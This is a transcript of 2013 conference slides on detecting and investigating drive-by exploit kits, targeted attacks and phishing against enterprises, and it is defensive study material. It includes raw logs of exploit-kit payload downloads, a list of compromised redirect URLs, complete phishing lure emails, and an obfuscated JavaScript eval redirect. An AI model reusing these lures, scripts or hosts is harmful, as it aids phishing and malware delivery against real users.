Phd III - defending enterprise
description
Transcript of Phd III - defending enterprise
![Page 1: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/1.jpg)
DISSECTING RAW DATA: finding needles in the haystack
or the way to survive in the Dangerous Russian Environment
Fyodor Yarochkin Vladimir Kropotov Vitaly Chetvertakov May 2013, Moscow
![Page 2: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/2.jpg)
About the speakers
Common interest: investigating unlawful activities for fun and profit ;-)
We can't spell. All mistakes are ours :)All the pictures used in this prezo are (c) googled ;-)
![Page 3: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/3.jpg)
Agenda
●Methodology of dealing with emerging threats●Case studies●Automation techniques and tools●Q&A
![Page 4: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/4.jpg)
Overview
● Understand threats● Real time visibility● You owned. Your
actions?● Owned: finding who
targets you, what data they want. What's been compromised
Prepare
Protect
Investigate
Detect
![Page 5: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/5.jpg)
Getting ready :)
PREPARE
![Page 6: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/6.jpg)
Initial network compromise: threats
●DbD attacks●Email as attack vector●Direct attacks against servers
Client-targeting attacks are on the rise
EASY!
Bigger number of
targets!
Users cumulative IQ
< 0! ;-)
![Page 7: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/7.jpg)
Drive-By in Nutshell :)
● Visit an infected site (any banner network can be a lead too)
● Traffic distribution/TDS (not compulsory)● Target Identification (javascript exploit
selection)● Exploit● Payload (.exe)● Profit!
STILLBIG!!
![Page 8: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/8.jpg)
DBD attacks
● Easy to collect samples
● Payload sent over the wire in plain
● Easy to automate analysis with sandbox
● Payload is typically encoded (XOR) or encrypted
● Exploit triggered on user events
● Serve once per IP, Blacklisting
Before... Now
![Page 9: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/9.jpg)
APT!APT!
APT!
APT!
APT!
APT! APT! APT!APT!
APT!
APT!APT!
APT!
APT!
APT!
![Page 10: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/10.jpg)
So, what is APT?
Someone wants YOUR stuff :-)
![Page 11: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/11.jpg)
Drive by .. are you a target?
● A single exploit● Served to limited
range of IP address (some times)
● Payload behavior is very specific
● Exploit packs● Generic Exploit
packs (Redkit, Nitrino, famous Blackhole etc)
● Payload vary
APT Not APT
![Page 12: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/12.jpg)
APT-related driveby example
● Does not include many exploits
● Is not using any off-shelf exploit pack
● Exploit code changes
often
![Page 13: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/13.jpg)
APT example cont..
● Binary pattern payload. VM sandbox detection
![Page 14: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/14.jpg)
Call-back analysis
![Page 15: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/15.jpg)
Bot vs Human
![Page 16: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/16.jpg)
Exploit packs and kits
![Page 17: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/17.jpg)
Bodyless Bot
![Page 18: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/18.jpg)
![Page 19: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/19.jpg)
GET;http://demonsstoryboard.pw/80F5;HTTP/1.1
95.211.7.3
200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1
95.211.7.3
200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1
95.211.7.3
200 135534 - Java/1.7.0_07 application/octet-stream
Exploit kits in your log
![Page 20: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/20.jpg)
Crosss-domain
![Page 21: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/21.jpg)
GET;http://teware.info/crossdomain.xml;HTTP/1.1
62.109.7.187 200
391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows)
text/xml
GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1
62.109.7.187 200
826 http://www.divetour.su/admin/lang/EN/logit.swf
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1
82.146.56.201
200
27206 http://www.divetour.su/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1
188.120.230.94
200
9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/3dr
GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1
188.120.230.94
200
164332
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/executable
![Page 22: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/22.jpg)
![Page 23: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/23.jpg)
![Page 24: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/24.jpg)
![Page 25: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/25.jpg)
GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1
37.9.52.21
200
949
http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
200
647
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
403
295
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
-
![Page 26: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/26.jpg)
Get 0wned quick!
![Page 27: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/27.jpg)
Domain-rotation techniques
![Page 28: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/28.jpg)
http://olgaclaroto.com/mikcxwe.php
http://fcslavutich.ck.ua/nmwdbvg.php
http://temizayakkabi.com/larwyyo.php
http://familystori.com/mhwrdaw.php
http://www.residensea.jp/xuaioxc.php
http://firenzeviaroma.ru/dqryony.php
http://sphynxtoutnu.com/dnqaibb.php
http://www.icmjapan.co.jp/dgttcnm.php
http://www.controlseal.nl/yolelkx.php
http://ural.zz.mu/ledstsn.php
http://www.fotobit.pl/cpjjpei.php
http://bgcarshop.com/tgghhvy.php
http://www.borkowski.org/fudbqrf.php
http://shop.babeta.ru/puthnkn.php
http://e-lustrate.us/mycbbni.php
http://notarypublicconcept.com/shfvtpx.php
http://www.stempelxpress.nl/vechoix.php
http://64.68.190.53/dqohago.php
http://likos.orweb.ru/oydochh.php
http://wap.warelex.com/parpkeu.php
http://caglayandalgicpompa.com/vgptlav.php
http://v-madrid.ru/iqsjnvl.php
http://www.tamandhiep.com/caectvo.php
http://bulgurluhamami.com/wyscthy.php
http://pcprint.es/xymijte.php
http://genckoltukdoseme.com/jydudjd.php
http://www.mgftools.com/fakmgbv.php
http://ohtparis.com/msmfguo.php
http://kenankocticaret.com/myrivrk.php
http://restaurangmaskiner.net/rwuwkqx.php
http://fvp.nau.edu.ua/uhetymf.php
http://kontra-antiabzocker.net/xubolww.php
http://artmaster39.ru/jtfsajd.php
http://drcalotti.com/llfisbj.php
http://adult-toy.ru/immjdti.php
http://corumhaberi.com/ugfrcal.php
http://opr.kz/jwcxbwi.php
http://peggysmith.nl/thtaywn.php
http://nic-ram.com/jqdkfrh.php
http://minsociety.org/djafssg.php
![Page 29: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/29.jpg)
![Page 30: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/30.jpg)
Domain rotation victims
● Over 500 compromised domains in 24 hours
● Domain rotation once per minute (3 minutes in the other incident)
![Page 31: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/31.jpg)
TDS injections
![Page 32: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/32.jpg)
![Page 33: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/33.jpg)
GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1
37.10.104.72
200
640
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72
200
442
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1
31.7.184.194
200
1578
3
http://ctgwllr.changeip.name/uqrojdt/2
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1
31.7.184.194
200
466
http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1
31.7.184.194
200
1001
http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1
31.7.184.194
200
8772
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/x-jar
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1
31.7.184.194
200
8636
4
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
![Page 34: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/34.jpg)
Electronic Mail as attack vector
● Email is another common method for an adversary to put a foot into the target network.
● Attractiveness:● Low profile (you only send emails to those
who you want to comromise)● Easy antivirus bypass (password-packed zip
archives anyone?:)● Users are generally – idiots ;-)
![Page 35: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/35.jpg)
Email as attack vector.. are you a target?
● Single exploit● Content of the mail is
accurate to context● Specific payload
behavior (stats)
● Mass-mailed● Often no exploit used
(.exe in attach)
APT? Non-targeted
![Page 36: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/36.jpg)
APT through email.. An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." )
Payload writes a dll fileRecent build date (2013)Autorun for persistence
Calls back to C2 server groupSuspicious user Agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)
![Page 37: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/37.jpg)
How to catch...
● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc)
● Time-series traffic analysis
Emerging Threats has a large number of APT related sigs. Take-and-modify :)
![Page 38: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/38.jpg)
Owning a network..
● Vulnerabilities seen in use through this attack vector:
Adobe Acrobat readerCVE-2013-0640CVE-2012-0775Adobe flash playerCVE-2012-1535
MS OfficeCVE-2012-0158CVE-2011-1269CVE-2010-3333CVE-2009-3129
JavaCVE-2013-0422CVE-2012-1723CVE-2012-5076
![Page 39: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/39.jpg)
But...
● Human stupidity is exploited more than ever..
![Page 40: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/40.jpg)
Email with a password protected archive or a document
● Password protected archives bypass AV checks, firewall/WAF/.. detection
● No exploit. Executable File is masked as document (icon, extension)
● Message contents motivates user to open the attachment (social engineering)
![Page 41: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/41.jpg)
Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь насумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акти выслать его скан. А также спрашивает, что лучше написать при переводе средств._____________________________________________________________________________________
С уважением, комерческий директор ОАО "М-ТОРГ"Маркина Ольга Алексеевна
ps. акт сверки в приложении к письму, пароль к архив 111
Lets look at some examples
![Page 42: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/42.jpg)
Добрый день,По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами задекабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписатьданный акт и выслать его скан. А также спрашивает, что лучше написать при переводесредств. _______________________________________________________________________________
С уважением, бухгалтер ЗАО "МСК"Калинина Вера Владимировна
ps. акт сверки в приложении к письму, пароль к архиву 123
Examples (cont...)
Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123
![Page 43: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/43.jpg)
Unpacked file
.. and inside archive :)
![Page 44: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/44.jpg)
Subject: British Airways E-ticket receiptse-ticket receiptBooking reference: 05V9363845Dear,Thank you for booking with British Airways.Ticket Type: e-ticketThis is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)Yours sincerely,British Airways Customer ServicesBritish Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.How to contact usAlthough we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.If you require further assistance you may contact usIf you have received this email in errorThis is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
Another example
![Page 45: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/45.jpg)
Another variation: email that contains masked links to malicious
pages•No attachment. The message text is html/text points to the same resource
•All links are 'masked' to be pointing to legit links
•The same attreactive text of the message
![Page 46: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/46.jpg)
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
Encoded redirect..
![Page 47: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/47.jpg)
Hot topic for big company, Cyprus Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! **Cyprus can amend terms to a bailout deal that has sparked huge public anger....< http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail **Choose the news and sport headlines you want - when you want them, all in one daily e-mail< http://www.bbc.co.uk/email> ** Disclaimer **The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
![Page 48: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/48.jpg)
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:Package Type: QTR/YE ReportingCourier: UPS GroundEstimated Time of Arrival: Tusesday, 5:00pmTracking Number (if one is available for this package): 1Z023R961390411904Details: Click here to view and/or modify orderWe will notify you via email if the status of your delivery changes.--------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com:o Payroll and Tax Calculatorso Order Payroll Supplies, Blank Checks, and moreo Submit requests online such as SUI Rate Changes, Schedule Changes, and moreo Download Product Documentation, Manuals, and Formso Download Software Patches and Updateso Access Knowledge Solutions / Frequently Asked Questionso Watch Animated Tours with Guided Input InstructionsThank You,ADP Client Servicessupport.ADP.com--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
![Page 49: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/49.jpg)
What happens if you click..
![Page 50: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/50.jpg)
So once we have the basic knowledge, lets move on :)
DETECT
![Page 51: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/51.jpg)
We will spend a bit more time discussing detection activities.
Because this is what we primarily do :)
![Page 52: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/52.jpg)
So how you detect attacks in your traffic..
![Page 53: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/53.jpg)
What to look for..• Search for randomly generated
domains• Search for 3rd level domains with
dynamic dns prefixes (dyndns, dnsdojo and e.t.c.)
• Search by known malware IPs• Search by known constant parts in
URLs and domain names• Search by intermediate domains that
used in attack
![Page 54: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/54.jpg)
• Banner networks simulation• DGA generated domains• Compromised domains• dyndns• Time-based redirects (9 till 6pm Moscow time)• Using not standard ports • Once per IP per day• Blacklists (Yes! They blacklist us too)
Common Counter-Detection Techniques
![Page 55: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/55.jpg)
1)MIME type • application\java-archive,
application\x-jar, application\3dr for Java Exploits
• application\PDF for Acrobat reader Exploits
• application\x-shockwave-flash for adobe flash player
2) User agent (Mozilla(Windows ...)•
Things to look for..
![Page 56: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/56.jpg)
Example..
![Page 57: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/57.jpg)
![Page 58: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/58.jpg)
• Exploit code/Malware components in Temp folder• activity of installer malware• Detect bruteforce attacks for standard a/c: admin, guest• Look for other suspicious IDS events
HTTP_Probe, SMB_Probes etc
Other things to pay attention to...
![Page 59: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/59.jpg)
Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-)
The exploit can be in cache – AV finds it :)
AV logs – useful ;)
![Page 60: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/60.jpg)
Antivirus detect malware modules
![Page 61: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/61.jpg)
PROTECT
![Page 62: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/62.jpg)
Approaches
Identify impactand isolate impacted machines
Exploit features of exploit kits to immunize your network
![Page 63: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/63.jpg)
Attacker wants to serveonce per IP...
● Automate visits to exploit pack serving points from your Client Honeybox/VM.
● Magic – exploit is not served to your users anymore.
![Page 64: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/64.jpg)
Exploiting Redundancy Properties in the malware
distribution and postinfection
activities campaigns
![Page 65: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/65.jpg)
INVESTIGATE
![Page 66: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/66.jpg)
DNSLyzer
http://github.com/fygrave/dnslyzer/
![Page 67: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/67.jpg)
Not only payload used as transition (covert channel in URL)
● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0
![Page 68: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/68.jpg)
GET READY FOR AV TROLL!! :)
![Page 69: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/69.jpg)
Strange things happen on the wire;)
![Page 70: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/70.jpg)
![Page 71: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/71.jpg)
![Page 72: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/72.jpg)
Useful tools
● AOL Moloch https://github.com/aol/moloch
![Page 73: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/73.jpg)
APT mail
● Xecure-lab APT document scanner
![Page 74: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/74.jpg)
TIPS
![Page 75: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/75.jpg)
Encrypted payload in not targeted attacks
● If full attack session was not collected (e.g. traffic dumps) don't waste vendors time
● Block all unrecognized/ uncategorized content (Default Deny) or you get FN at all intermediate (transit) hosts
![Page 76: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/76.jpg)
Be careful to share/check online samples especially for targeted
attacks
● Vendors are sharing while attackers monitor changes
● FP ~ your shared some internal staff (especially not executable files, like office documents) with third party = security policy violation
![Page 77: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/77.jpg)
Monitoring VS Protection
● Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))
![Page 78: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/78.jpg)
Incident Mitigation VS Investigation
● If your preparation is not enough
Efficiency(Mitigation)~ O(1/ Efficiency(Investigation))
● If you prepared, almost all steps of Investigation you can do asynchronously
![Page 79: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/79.jpg)
Tracking Activity in the organization in 3rd party networks
● Examples in the presentation related to incidents in the third party networks and reproduced in the attacker desirable, but adopted environment.
DISCLAIMER
![Page 80: Phd III - defending enterprise](https://reader033.fdocuments.in/reader033/viewer/2022051819/54c68f714a795915558b45f9/html5/thumbnails/80.jpg)
Q & A